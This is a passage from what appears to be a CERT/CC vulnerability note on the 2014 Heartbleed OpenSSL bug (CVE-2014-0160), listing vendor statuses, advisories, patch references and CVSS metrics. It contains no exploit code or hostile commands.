database, and anyone using external \nauthentication (which \nrequires BASIC authentication over SSL). This is necessary because the \nvulnerability may have \nresulted in password leaks. \n \n \n \nIf you have any questions about how to patch, feel free to contact \nsupport@marklogic.com. \n \n \n \nMore information about the heartbleed vulnerability can be found at \n<http://heartbleed.com> or \n<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160>.`\n\n### __ McAfee \n\nNotified: April 08, 2014 Updated: April 11, 2014 \n\n**Statement Date: April 11, 2014**\n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n[https://kc.mcafee.com/corporate/index?page=content&id=SB10071](<https://kc.mcafee.com/corporate/index?page=content&id=SB10071>)\n\n### __ __ NVIDIA \n\nUpdated: May 05, 2014 \n\n**Statement Date: May 05, 2014**\n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\n<http://nvidia.custhelp.com/app/answers/detail/a_id/3492>\n\n### __ __ NetBSD \n\nNotified: April 08, 2014 Updated: April 08, 2014 \n\n**Statement Date: April 08, 2014**\n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nNetBSD is vulnerable (in the version 6 train, not in the version 5 train) pkgsrc is vulnerable (1.0.1 versions of OpenSSL packages below 1.0.1g, no surprises there)\n\n### Vendor References\n\n<http://mail-index.netbsd.org/security-announce/2014/04/08/msg000085.html>\n\n### __ OpenBSD \n\nNotified: April 08, 2014 Updated: April 08, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n<http://ftp.openbsd.org/pub/OpenBSD/patches/5.5/common/002_openssl.patch.sig\nhttp://ftp.openbsd.org/pub/OpenBSD/patches/5.4/common/007_openssl.patch\nhttp://ftp.openbsd.org/pub/OpenBSD/patches/5.3/common/014_openssl.patch>\n\n### __ OpenSSL \n\nUpdated: April 09, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n<https://www.openssl.org/news/secadv_20140407.txt>\n\n### __ OpenVPN Technologies \n\nUpdated: April 09, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n<https://community.openvpn.net/openvpn/wiki/heartbleed>\n\n### __ Oracle Corporation \n\nNotified: April 08, 2014 Updated: April 16, 2014 \n\n**Statement Date: April 16, 2014**\n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n<http://www.oracle.com/technetwork/topics/security/opensslheartbleedcve-2014-0160-2188454.html>\n\n### __ Red Hat, Inc. \n\nNotified: April 08, 2014 Updated: April 08, 2014 \n\n**Statement Date: April 08, 2014**\n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n<https://access.redhat.com/security/cve/CVE-2014-0160\nhttps://bugzilla.redhat.com/show_bug.cgi?id=CVE-2014-0160\nhttps://rhn.redhat.com/errata/RHSA-2014-0376.html>\n\n### __ Slackware Linux Inc. \n\nNotified: April 08, 2014 Updated: April 09, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n[http://www.slackware.com/security/viewer.php?l=slackware-security&y=2014&m=slackware-security.533622](<http://www.slackware.com/security/viewer.php?l=slackware-security&y=2014&m=slackware-security.533622>)\n\n### __ Sophos, Inc. \n\nUpdated: April 09, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n<http://blogs.sophos.com/2014/04/09/sophos-utm-manager-and-openssl-vulnerability/>\n\n### __ Symantec \n\nNotified: April 08, 2014 Updated: May 13, 2016 \n\n**Statement Date: April 18, 2014**\n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n[http://www.symantec.com/outbreak/?id=heartbleed http://www.symantec.com/content/en/us/enterprise/other_resources/b-symantec-product-list-heartbleed.pdf https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20160512_00](<http://www.symantec.com/outbreak/?id=heartbleed\nhttp://www.symantec.com/content/en/us/enterprise/other_resources/b-symantec-product-list-heartbleed.pdf\nhttps://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20160512_00>)\n\n### Addendum\n\nCERT/CC has confirmed with Symantec that Symantec Messaging Gateway version 10.6.1 is vulnerable. Please see the most recent Symantec advisory (`SYM16-007`) above.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23720951 Feedback>).\n\n### __ Ubuntu \n\nNotified: April 08, 2014 Updated: April 09, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n<http://www.ubuntu.com/usn/usn-2165-1/\nhttps://bugs.launchpad.net/ubuntu/+source/openssl/+bug/1304042>\n\n### Addendum\n\nNote that the version number reported by openssl does not reflect the patch level. To verify that the usn-2165-1 fixed versions are installed, run the following command \n`dpkg -l openssl libssl* | cat` \nand compare the reported version numbers with those listed in the advisory.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23720951 Feedback>).\n\n### __ __ Unisys \n\nNotified: April 08, 2014 Updated: April 17, 2014 \n\n**Statement Date: April 17, 2014**\n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\n**Heartbleed bug \u2013 Public and Client Communication**\n\nDear Unisys client,\n\nUnisys prides itself on ensuring the mission-critical operations of our clients \u2013 and the security of your systems is a priority for us. I am writing to let you know how we are addressing any risks related to the Heartbleed bug that has been reported in the news and to provide you with information that may help you address your own risks.\n\nHeartbleed is a software bug in the OpenSSL technology used to create a secure link over the Internet between a server and a computer asset such as a laptop or PC. The bug, which has existed for about two years but was only publicly disclosed last week, is believed to have affected a significant number of websites globally. \n\nUnisys has undertaken a comprehensive review of our servers, products, and client-owned servers under our management for risks associated with the Heartbleed bug. Here\u2019s what you need to know:\n\n-We have not found any vulnerability in our public-facing Web servers. We continue to monitor the product advisories of our major vendors for any potential issues. \n\n\n-The vast majority of our released products, including MCP, OS 2200, Forward!, Stealth, and Choreographer, are not vulnerable to the Heartbleed bug. Two instances of potential vulnerabilities were found in add-on products; in those cases, we have done remediation efforts and notified clients. \n\n\n-The vast majority of client-owned servers under our management are not affected by the Heartbleed bug. For servers that may have been affected, we have notified the client and after consulting with the client, we are in the process of patching those servers, changing the server side certificates and instructing users to change their passwords. \n\n\n-Currently, only version 1.0.1 - 1.0.1f of the open-source SSL is affected. We have upgraded any client-owned servers under our management to version 1.0.1g. We recommend that you check the other servers that you manage. \n\n\n-Our Security Services team can help you in this process and can also perform a penetration test to determine if you are vulnerable and help you contain any resulting damage.\n\nWe stand ready to assist you. Please contact your Unisys representative or service delivery manager to discuss your requirements or to order a penetration test.\n\nWe appreciate your business.\n\nUnisys\n\n### __ __ VMware \n\nNotified: April 08, 2014 Updated: April 22, 2014 \n\n**Statement Date: April 09, 2014**\n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nVMware has released product updates and patches for all affected products\n\nlisted in VMware Knowledge Base article 2076225.\n\n### Vendor Information\n\nVMware Security Advisory VMSA-2014-0004 lists the updated products and \npatch releases that address CVE-2014-0160 in VMware products and provides \nreferences to specific product documentation.\n\n### Vendor References\n\n<http://www.vmware.com/security/advisories/VMSA-2014-0004.html\nhttp://kb.vmware.com/kb/2076225>\n\n### __ Watchguard Technologies, Inc. \n\nUpdated: April 09, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n<http://watchguardsecuritycenter.com/2014/04/08/the-heartbleed-openssl-vulnerability-patch-openssl-asap/>\n\n### __ __ Wind River Systems, Inc. \n\nNotified: April 08, 2014 Updated: April 11, 2014 \n\n**Statement Date: April 08, 2014**\n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWind River has investigated its products regarding the heart blead vulnerability. The conclusion is:\n\nVxWorks is not vulnerable. \nWR Linux 3.x and 4.x are not vulnerable. \nWR Linux 5.0.1.x is vulnerable if the optional openssl-1.0.1 package is installed. \nWR Linux 6.0.0.x is vulnerable. \nINP 3.4 is vulnerable. \n \nWind River customers can find additional information, e.g. fixes, at the online support web site <https://support.windriver.com/>\n\n### Vendor References\n\n<https://support.windriver.com/>\n\n### __ nginx \n\nUpdated: April 11, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n<http://nginx.com/blog/nginx-and-the-heartbleed-vulnerability/>\n\n### Addendum\n\nnginx for Windows is statically linked with the OpenSSL library. We have confirmed that nginx versions 1.2.9 through 1.4.7 on Windows provide a vulnerable OpenSSL version.\n\nnginx 1.4.7, which was originally released on March 18, 2014, was silently repackaged with OpenSSL 1.0.1g on April 8, 2014. \nnginx 1.5.13 was officially released on April 8, 2014, and it also includes OpenSSL 1.0.1g, despite not specifically mentioning this vulnerability.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23720951 Feedback>).\n\n### __ openSUSE project \n\nUpdated: April 09, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n<http://lists.opensuse.org/opensuse-security-announce/2014-04/msg00005.html>\n\n### __ pfSENSE \n\nUpdated: April 17, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n<https://blog.pfsense.org/?p=1253>\n\n### __ __ Brocade \n\nUpdated: April 11, 2014 \n\n### Status\n\n__ Not Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\n`TECHNICAL SUPPORT BULLETIN \nApril 10, 2014 \n________________________________________ \nTSB 2014-185-ASEVERITY: Low - Information \n________________________________________ \nPRODUCTS AFFECTED: \nAll Brocade products, including Vyatta \n \nCORRECTED IN RELEASE: \nAll current releases of Brocade products, including Vyatta \n \nBULLETIN OVERVIEW \n \nThe purpose of this bulletin is to provide information regarding the recently \ndisclosed vulnerability in the OpenSSL protocol documented by CVE-2014-0160 and \nalso known as \"The Heartbleed bug.\" This vulnerability takes advantage of the \nheartbeat extensions to the OpenSSL protocol (RFC6520). \n \nBrocade's family of IP products ADX, FCX, ICX, MLX, MLX-E, XMR CES, CER, RX, \nSX, VDX offering ServerIron, FastIron, NetIron, RX, Network OS, Brocade Network \nAdvisor, Vyatta and vADX software and SAN products offering FOS software do not \nmake use of the heartbeat extensions and hence are not vulnerable to the \nexploit documented in CVE-2014-0160. \nIn addition, the MyBrocade.com web site does not use OpenSSL and is not \nvulnerable to this issue. \n \n \nPROBLEM STATEMENT \nThe (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not \nproperly handle Heartbeat Extension packets, which allows remote attackers to \nobtain sensitive information from process memory via crafted packets that \ntrigger a buffer over-read, as demonstrated by reading private keys, related to \nd1_both.c and t1_lib.c, aka the Heartbleed bug. \n<https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0160> \n \nRISK ASSESSMENT \nThere is no risk using Brocade products \nSYMPTOMS \nNot applicable. \nWORKAROUND \nNo workaround is necessary. \nCORRECTIVE ACTION \nNot applicable.`\n\n### __ __ EfficientIP \n\nUpdated: April 09, 2014 \n\n**Statement Date: April 09, 2014**\n\n### Status\n\n__ Not Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nOur system uses FreeBSD 9.2 as basis, and the OpenSSL version shipped with this version (0.9.8y) are stated not be affected.\n\n### __ __ Foundry Networks, Inc. \n\nNotified: April 08, 2014 Updated: April 11, 2014 \n\n**Statement Date: April 09, 2014**\n\n### Status\n\n__ Not Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nNo Brocade (Foundry) products are affected by this vulnerability,\n\n### Addendum\n\nFoundry was purchased by Brocade.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23720951 Feedback>).\n\n### __ __ Infoblox \n\nNotified: April 08, 2014 Updated: April 08, 2014 \n\n**Statement Date: April 08, 2014**\n\n### Status\n\n__ Not Affected\n\n### Vendor Statement\n\nInfoblox is not affected by this issue (in any released version).\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ __ Microsoft Corporation \n\nNotified: April 08, 2014 Updated: April 21, 2014 \n\n**Statement Date: April 21, 2014**\n\n### Status\n\n__ Not Affected\n\n### Vendor Statement\n\nMicrosoft Services unaffected by OpenSSL \u201cHeartbleed\u201d vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n<http://blogs.technet.com/b/security/archive/2014/04/10/microsoft-devices-and-services-and-the-openssl-heartbleed-vulnerability.aspx>\n\n### __ Opengear \n\nUpdated: April 15, 2014 \n\n### Status\n\n__ Not Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n<https://opengear.zendesk.com/entries/51667116-CVE-2014-0160-aka-Heartbleed-Opengear-products-are-not-affected>\n\n### __ __ Openwall GNU/*/Linux \n\nNotified: April 08, 2014 Updated: April 09, 2014 \n\n### Status\n\n__ Not Affected\n\n### Vendor Statement\n\nOpenwall GNU/*/Linux is not affected. The versions of OpenSSL that we redistribute do not contain the vulnerable code.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ __ Peplink \n\nNotified: April 08, 2014 Updated: April 18, 2014 \n\n**Statement Date: April 08, 2014**\n\n### Status\n\n__ Not Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nPeplink products are NOT affected by this vulnerability.\n\n### Vendor References\n\n<https://forum.peplink.com/threads/3062-Special-Notice-On-OpenSSL-Heartbleed-Vulnerability>\n\n### __ __ Quagga \n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n**Statement Date: April 08, 2014**\n\n### Status\n\n__ Not Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nQuagga is not affected by this vulnerability.\n\n### __ SUSE Linux \n\nNotified: April 08, 2014 Updated: April 08, 2014 \n\n### Status\n\n__ Not Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n<http://lists.opensuse.org/opensuse-security-announce/2014-04/msg00005.html>\n\n### Addendum\n\nSUSE Enterprise Linux uses OpenSSL 0.9.x\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23720951 Feedback>).\n\n### __ __ Vyatta \n\nNotified: April 08, 2014 Updated: April 11, 2014 \n\n### Status\n\n__ Not Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\n`TECHNICAL SUPPORT BULLETIN \nApril 10, 2014 \n________________________________________ \nTSB 2014-185-ASEVERITY: Low - Information \n________________________________________ \nPRODUCTS AFFECTED: \nAll Brocade products, including Vyatta \n \nCORRECTED IN RELEASE: \nAll current releases of Brocade products, including Vyatta \n \nBULLETIN OVERVIEW \n \nThe purpose of this bulletin is to provide information regarding the recently \ndisclosed vulnerability in the OpenSSL protocol documented by CVE-2014-0160 and \nalso known as \"The Heartbleed bug.\" This vulnerability takes advantage of the \nheartbeat extensions to the OpenSSL protocol (RFC6520). \n \nBrocade's family of IP products ADX, FCX, ICX, MLX, MLX-E, XMR CES, CER, RX, \nSX, VDX offering ServerIron, FastIron, NetIron, RX, Network OS, Brocade Network \nAdvisor, Vyatta and vADX software and SAN products offering FOS software do not \nmake use of the heartbeat extensions and hence are not vulnerable to the \nexploit documented in CVE-2014-0160. \nIn addition, the MyBrocade.com web site does not use OpenSSL and is not \nvulnerable to this issue. \n \n \nPROBLEM STATEMENT \nThe (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not \nproperly handle Heartbeat Extension packets, which allows remote attackers to \nobtain sensitive information from process memory via crafted packets that \ntrigger a buffer over-read, as demonstrated by reading private keys, related to \nd1_both.c and t1_lib.c, aka the Heartbleed bug. \n``<https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0160>`` \n \nRISK ASSESSMENT \nThere is no risk using Brocade products \nSYMPTOMS \nNot applicable. \nWORKAROUND \nNo workaround is necessary. \nCORRECTIVE ACTION \nNot applicable.`\n\n### __ __ WSO2 \n\nUpdated: April 15, 2014 \n\n### Status\n\n__ Not Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nOn April 7th, a Security Advisory was issued by the OpenSSL project notifying the public of a serious vulnerability in the encryption software used by a majority of websites on the Internet.\n\n[http://connect.wso2.com/wso2/c/secadv_20140407.txt?_lid=62396&_cid=77097&_t=859269](<http://connect.wso2.com/wso2/c/secadv_20140407.txt?_lid=62396&_cid=77097&_t=859269>) \n \nWe want you to know that our servers were not exposed and your WSO2 account is completely safe. Nevertheless, to ensure there is no additional risk, we strongly encourage you to request a new password. \n[http://connect.wso2.com/wso2/c/password?_lid=62397&_cid=77097&_t=859269](<http://connect.wso2.com/wso2/c/password?_lid=62397&_cid=77097&_t=859269>) \n \nIf you have any questions or concerns, please email security@wso2.com. \n \nFor additional information regarding this vulnerability, please visit: \n[http://connect.wso2.com/wso2/c/heartbleed.com?_lid=62398&_cid=77097&_t=859269](<http://connect.wso2.com/wso2/c/heartbleed.com?_lid=62398&_cid=77097&_t=859269>)\n\n### __ __ m0n0wall \n\nNotified: April 08, 2014 Updated: April 08, 2014 \n\n**Statement Date: April 08, 2014**\n\n### Status\n\n__ Not Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nm0n0wall is not affected (as it uses OpenSSL 0.9.8).\n\n### __ ACCESS \n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### __ AT&T \n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### __ Alcatel-Lucent \n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### __ Apple Inc. \n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### __ Avaya, Inc. \n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### __ Barracuda Networks \n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### __ Belkin, Inc. \n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### __ Charlotte's Web Networks \n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### __ Check Point Software Technologies \n\nNotified: April 08, 2014 Updated: April 09, 2014 \n\n**Statement Date: April 08, 2014**\n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n[https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk100173](<https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk100173>)\n\n### __ Cray Inc. \n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### __ D-Link Systems, Inc. \n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### __ DragonFly BSD Project \n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### __ EMC Corporation \n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### __ Engarde Secure Linux \n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### __ Enterasys Networks \n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### __ Ericsson \n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### __ Force10 Networks, Inc. \n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### __ Fujitsu \n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### __ IBM Corporation (zseries) \n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### __ IBM eServer \n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### __ Internet Security Systems, Inc. \n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### __ Intoto \n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### __ MontaVista Software, Inc. \n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### __ __ NEC Corporation \n\nNotified: April 08, 2014 Updated: April 30, 2014 \n\n**Statement Date: April 30, 2014**\n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nWe provide information on this issue at the following URL\n\n<http://jpn.nec.com/security-info/av14-001.html> (only in Japanese)\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n<http://jpn.nec.com/security-info/av14-001.html>\n\n### __ Nokia \n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### __ Novell, Inc. \n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### __ Palo Alto Networks \n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### __ Process Software \n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### __ Q1 Labs \n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### __ QNX Software Systems Inc. \n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### __ SafeNet \n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### __ SmoothWall \n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### __ Snort \n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### __ Sony Corporation \n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### __ Sourcefire \n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### __ Stonesoft \n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### __ The SCO Group \n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### __ TippingPoint Technologies Inc. \n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### __ Turbolinux \n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### __ Watchguard Technologies, Inc. \n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### __ ZyXEL \n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### __ eSoft, Inc. \n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### __ netfilter \n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | 5.0 | AV:N/AC:L/Au:N/C:P/I:N/A:N \nTemporal | 4.1 | E:F/RL:OF/RC:C \nEnvironmental | 6.5 | CDP:LM/TD:H/CR:H/IR:H/AR:ND \n \n \n\n\n### References \n\n * <http://heartbleed.com/>\n * <http://seclists.org/oss-sec/2014/q2/22>\n * <http://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=96db902>\n * <https://tools.ietf.org/html/rfc6520>\n * <http://www.openssl.org/news/openssl-1.0.1-notes.html>\n * 